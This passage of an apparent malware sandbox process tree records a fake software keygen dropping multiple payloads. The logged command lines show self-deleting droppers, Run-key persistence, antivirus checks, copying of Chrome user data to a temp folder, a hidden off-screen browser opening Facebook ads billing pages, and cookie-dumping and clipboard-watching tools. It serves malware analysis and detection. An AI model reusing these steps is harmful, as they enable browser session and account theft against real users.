            cmdline: "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3060 /prefetch:2
        [5] C:\Users\Admin\AppData\Roaming\Weather\Weather.exe  PID 1856
            cmdline: "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --mojo-platform-channel-handle=3560 /prefetch:8
        [5] C:\Users\Admin\AppData\Roaming\Weather\Weather.exe  PID 6476
            cmdline: "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --mojo-platform-channel-handle=3376 /prefetch:8
        [5] C:\Users\Admin\AppData\Roaming\Weather\Weather.exe  PID 6288
            cmdline: "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --mojo-platform-channel-handle=3340 /prefetch:8
        [5] C:\Users\Admin\AppData\Roaming\Weather\Weather.exe  PID 7648
            cmdline: "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --mojo-platform-channel-handle=828 /prefetch:8
    [3] C:\Windows\SysWOW64\cmd.exe  PID 4048
        cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE95DF.bat" "
      [4] C:\Windows\SysWOW64\attrib.exe  PID 4904
          cmdline: C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
          - Views/modifies file attributes
      [4] C:\Windows\SysWOW64\timeout.exe  PID 7240
          cmdline: C:\Windows\System32\timeout.exe 5
          - Delays execution with timeout.exe
      [4] C:\Windows\SysWOW64\timeout.exe  PID 5492
          cmdline: C:\Windows\System32\timeout.exe 5
          - Delays execution with timeout.exe
      [4] C:\Windows\SysWOW64\attrib.exe  PID 584
          cmdline: C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE95DF.bat"
          - Views/modifies file attributes
      [4] C:\Windows\SysWOW64\cmd.exe  PID 5400
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE95DF.bat" "
      [4] C:\Windows\SysWOW64\cmd.exe  PID 6972
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" cls"
    [3] C:\Windows\SysWOW64\cmd.exe  PID 5352
        cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE95BF.bat" "
      [4] C:\Windows\SysWOW64\attrib.exe  PID 7892
          cmdline: C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
          - Views/modifies file attributes
      [4] C:\Windows\SysWOW64\timeout.exe  PID 5724
          cmdline: C:\Windows\System32\timeout.exe 5
          - Delays execution with timeout.exe
      [4] C:\Windows\SysWOW64\attrib.exe  PID 4112
          cmdline: C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE95BF.bat"
          - Views/modifies file attributes
      [4] C:\Windows\SysWOW64\cmd.exe  PID 6236
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE95BF.bat" "
          - Blocklisted process makes network request
          - Executes dropped EXE
      [4] C:\Windows\SysWOW64\cmd.exe  PID 8088
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" cls"
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  PID 6132
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class

[1] \??\c:\windows\system32\svchost.exe  PID 4756
    cmdline: c:\windows\system32\svchost.exe -k netsvcs -s seclogon
    - Suspicious use of NtCreateUserProcessOtherParentProcess

[1] \??\c:\windows\system32\svchost.exe  PID 6996
    cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
    - Drops file in Windows directory
    - Checks SCSI registry key(s)
  [2] C:\Windows\system32\DrvInst.exe  PID 6264
      cmdline: DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{654a4584-ddbc-4d45-a2fc-02380a201167}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\maskvpn\driver\win764"
      - Drops file in System32 directory
      - Drops file in Windows directory
      - Checks SCSI registry key(s)
      - Modifies data under HKEY_USERS
  [2] C:\Windows\system32\DrvInst.exe  PID 1328
      cmdline: DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000158"
      - Drops file in Drivers directory
      - Drops file in System32 directory
      - Drops file in Windows directory
      - Checks SCSI registry key(s)

[1] \??\c:\windows\system32\svchost.exe  PID 1824
    cmdline: c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
    - Checks SCSI registry key(s)

[1] \??\c:\windows\system32\svchost.exe  PID 416
    cmdline: c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc

[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  PID 7416
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  PID 7916
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class

[1] C:\Windows\system32\werfault.exe  PID 7560
    cmdline: werfault.exe /h /shared Global\d4a4403d87a44e33a1fb72b1e7cbbd29 /t 4732 /p 7916

[1] C:\Windows\system32\werfault.exe  PID 4792
    cmdline: werfault.exe /h /shared Global\52cec7daec1d47828fc4e7cfa45a59ef /t 7636 /p 7416

[1] C:\Windows\System32\Conhost.exe  PID 8140
    cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[1] C:\Program Files (x86)\MaskVPN\mask_svc.exe  PID 3856
    cmdline: "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Modifies data under HKEY_USERS
  [2] C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe  PID 5844
      cmdline: MaskVPNUpdate.exe /silent
      - Suspicious use of SetWindowsHookEx

[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  PID 8036
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class

[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  PID 7840
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class

[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  PID 6496
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  PID 6064
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

[1] \??\c:\windows\system32\svchost.exe  PID 6336
    cmdline: c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc

[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  PID 6872
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
[1] C:\Users\Admin\AppData\Local\Temp\Temp2_Wondershare.Dr.fone.For.5.5.0.key.generator.zip\Wondershare.Dr.fone.For.5.5.0.key.generator.exe  PID 6584
    cmdline: "C:\Users\Admin\AppData\Local\Temp\Temp2_Wondershare.Dr.fone.For.5.5.0.key.generator.zip\Wondershare.Dr.fone.For.5.5.0.key.generator.exe"
  [2] C:\Windows\SysWOW64\cmd.exe  PID 2340
      cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen.bat" "
    [3] C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-pr.exe  PID 6380
        cmdline: keygen-pr.exe -p83fsase3Ge
      [4] C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe  PID 6800
          cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe"
          - Suspicious use of SetThreadContext
        [5] C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe  PID 4012
            cmdline: C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe -txt -scanlocal -file:potato.dat
    [3] C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-1.exe  PID 2208
        cmdline: keygen-step-1.exe
    [3] C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-2.exe  PID 3968
        cmdline: keygen-step-2.exe
        - Suspicious use of SetThreadContext
      [4] C:\Users\Admin\AppData\Roaming\D5DB.tmp.exe  PID 5216
          cmdline: "C:\Users\Admin\AppData\Roaming\D5DB.tmp.exe"
        [5] C:\Windows\SysWOW64\cmd.exe  PID 8400
            cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\D5DB.tmp.exe"
          [6] C:\Windows\SysWOW64\timeout.exe  PID 8432
              cmdline: timeout /T 10 /NOBREAK
              - Delays execution with timeout.exe
      [4] C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-2.exe  PID 7920
          cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-2.exe"
        [5] C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-2.exe  PID 6632
            cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-2.exe"
        [5] C:\Windows\SysWOW64\WerFault.exe  PID 2164
            cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7920 -s 268
            - Drops file in Windows directory
            - Program crash
      [4] C:\Windows\SysWOW64\cmd.exe  PID 7204
          cmdline: "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-2.exe" >> NUL
        [5] C:\Windows\SysWOW64\PING.EXE  PID 6092
            cmdline: ping 127.0.0.1
            - Runs ping.exe
    [3] C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-4.exe  PID 7932
        cmdline: keygen-step-4.exe
        - Checks computer location settings
      [4] C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe  PID 1984
          cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
        [5] C:\Users\Admin\AppData\Local\Temp\BR8QCOXSRF\multitimer.exe  PID 1940
            cmdline: "C:\Users\Admin\AppData\Local\Temp\BR8QCOXSRF\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
            - Drops file in Windows directory
          [6] C:\Users\Admin\AppData\Local\Temp\BR8QCOXSRF\multitimer.exe  PID 4116
              cmdline: "C:\Users\Admin\AppData\Local\Temp\BR8QCOXSRF\multitimer.exe" 1 3.1617987860.60708914f1a1d 101
              - Adds Run key to start application
            [7] C:\Users\Admin\AppData\Local\Temp\BR8QCOXSRF\multitimer.exe  PID 6924
                cmdline: "C:\Users\Admin\AppData\Local\Temp\BR8QCOXSRF\multitimer.exe" 2 3.1617987860.60708914f1a1d
                - Checks for any installed AV software in registry
              [8] C:\Users\Admin\AppData\Local\Temp\bb3yyjw4sz3\Setup3310.exe  PID 7776
                  cmdline: "C:\Users\Admin\AppData\Local\Temp\bb3yyjw4sz3\Setup3310.exe" /Verysilent /subid=577
                [9] C:\Users\Admin\AppData\Local\Temp\is-U5A1Q.tmp\Setup3310.tmp  PID 6752
                    cmdline: "C:\Users\Admin\AppData\Local\Temp\is-U5A1Q.tmp\Setup3310.tmp" /SL5="$70498,138429,56832,C:\Users\Admin\AppData\Local\Temp\bb3yyjw4sz3\Setup3310.exe" /Verysilent /subid=577
                  [10] C:\Users\Admin\AppData\Local\Temp\is-KEDNE.tmp\Setup.exe  PID 5504
                      cmdline: "C:\Users\Admin\AppData\Local\Temp\is-KEDNE.tmp\Setup.exe" /Verysilent
              [8] C:\Users\Admin\AppData\Local\Temp\iz5ityid4zf\kdp3zbvkdjh.exe  PID 4260
                  cmdline: "C:\Users\Admin\AppData\Local\Temp\iz5ityid4zf\kdp3zbvkdjh.exe" /ustwo INSTALL
                [9] C:\Windows\SysWOW64\cmd.exe  PID 9028
                    cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "kdp3zbvkdjh.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\iz5ityid4zf\kdp3zbvkdjh.exe" & exit
                  [10] C:\Windows\SysWOW64\taskkill.exe  PID 5232
                      cmdline: taskkill /im "kdp3zbvkdjh.exe" /f
                      - Kills process with taskkill
              [8] C:\Users\Admin\AppData\Local\Temp\kudvq2fcehc\app.exe  PID 7564
                  cmdline: "C:\Users\Admin\AppData\Local\Temp\kudvq2fcehc\app.exe" /8-23
                [9] C:\Users\Admin\AppData\Local\Temp\kudvq2fcehc\app.exe  PID 6584
                    cmdline: "C:\Users\Admin\AppData\Local\Temp\kudvq2fcehc\app.exe" /8-23
              [8] C:\Users\Admin\AppData\Local\Temp\33kuiitkyas\setup_10.2_us3.exe  PID 10356
                  cmdline: "C:\Users\Admin\AppData\Local\Temp\33kuiitkyas\setup_10.2_us3.exe" /silent
        [5] C:\Users\Admin\AppData\Local\Temp\Y6QM3CAZ3I\setups.exe  PID 7952
            cmdline: "C:\Users\Admin\AppData\Local\Temp\Y6QM3CAZ3I\setups.exe" ll
          [6] C:\Users\Admin\AppData\Local\Temp\is-JO853.tmp\setups.tmp  PID 5780
              cmdline: "C:\Users\Admin\AppData\Local\Temp\is-JO853.tmp\setups.tmp" /SL5="$2076E,1873631,71168,C:\Users\Admin\AppData\Local\Temp\Y6QM3CAZ3I\setups.exe" ll
              - Checks computer location settings
      [4] C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Version.exe  PID 7380
          cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Version.exe"
          - Drops file in Program Files directory
        [5] C:\Windows\SysWOW64\WScript.exe  PID 5148
            cmdline: "C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"
          [6] C:\Windows\SysWOW64\rundll32.exe  PID 1120
              cmdline: "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
      [4] C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe  PID 7664
          cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"
        [5] C:\Windows\SysWOW64\cmd.exe  PID 5532
            cmdline: cmd.exe /c taskkill /f /im chrome.exe
          [6] C:\Windows\SysWOW64\taskkill.exe  PID 5628
              cmdline: taskkill /f /im chrome.exe
              - Kills process with taskkill
        [5] C:\Windows\SysWOW64\xcopy.exe  PID 1120
            cmdline: xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
            - Enumerates system info in registry
        [5] C:\Program Files\Google\Chrome\Application\chrome.exe  PID 5308
            cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe  PID 6092
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff90bb06e00,0x7ff90bb06e10,0x7ff90bb06e20
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe  PID 2372
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1688 /prefetch:8
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe  PID 6020
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2228 /prefetch:8
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe  PID 6264
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2780 /prefetch:1
              - Adds Run key to start application
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe  PID 6328
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2772 /prefetch:1
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe  PID 7488
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe  PID 5808
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe  PID 7724
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe  PID 3324
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1636 /prefetch:2
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe  PID 5976
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3788 /prefetch:1
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe  PID 8720
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:1
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe  PID 3748
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3032 /prefetch:8
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe  PID 10840
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=5700 /prefetch:2
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe  PID 8252
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1976 /prefetch:8
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe  PID 9972
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5664 /prefetch:8
      [4] C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe  PID 8040
          cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
        [5] C:\Windows\SysWOW64\cmd.exe  PID 8504
            cmdline: "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe" >> NUL
          [6] C:\Windows\SysWOW64\PING.EXE  PID 8624
              cmdline: ping 127.0.0.1
              - Runs ping.exe
      [4] C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe  PID 8544
          cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"
      [4] C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe  PID 7032
          cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe"
        [5] C:\ProgramData\444818.exe  PID 9424
            cmdline: "C:\ProgramData\444818.exe"
        [5] C:\ProgramData\1416094.exe  PID 9460
            cmdline: "C:\ProgramData\1416094.exe"
            - Suspicious behavior: SetClipboardViewer
        [5] C:\ProgramData\1543556.exe  PID 9596
            cmdline: "C:\ProgramData\1543556.exe"
          [6] C:\ProgramData\1543556.exe  PID 8384
              cmdline: "{path}"
        [5] C:\ProgramData\2485131.exe  PID 9656
            cmdline: "C:\ProgramData\2485131.exe"
      [4] C:\Users\Admin\AppData\Local\Temp\RarSFX4\gcttt.exe  PID 9728
          cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX4\gcttt.exe"
        [5] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe  PID 10024
            cmdline: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        [5] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe  PID 3724
            cmdline: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    [3] C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-3.exe  PID 5352
        cmdline: keygen-step-3.exe
      [4] C:\Windows\SysWOW64\cmd.exe  PID 5584
          cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-3.exe"
        [5] C:\Windows\SysWOW64\PING.EXE  PID 8148
            cmdline: ping 1.1.1.1 -n 1 -w 3000
            - Runs ping.exe
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  PID 4828
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class

[1] C:\Windows\system32\AUDIODG.EXE  PID 4140
    cmdline: C:\Windows\system32\AUDIODG.EXE 0x40c

[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  PID 8212
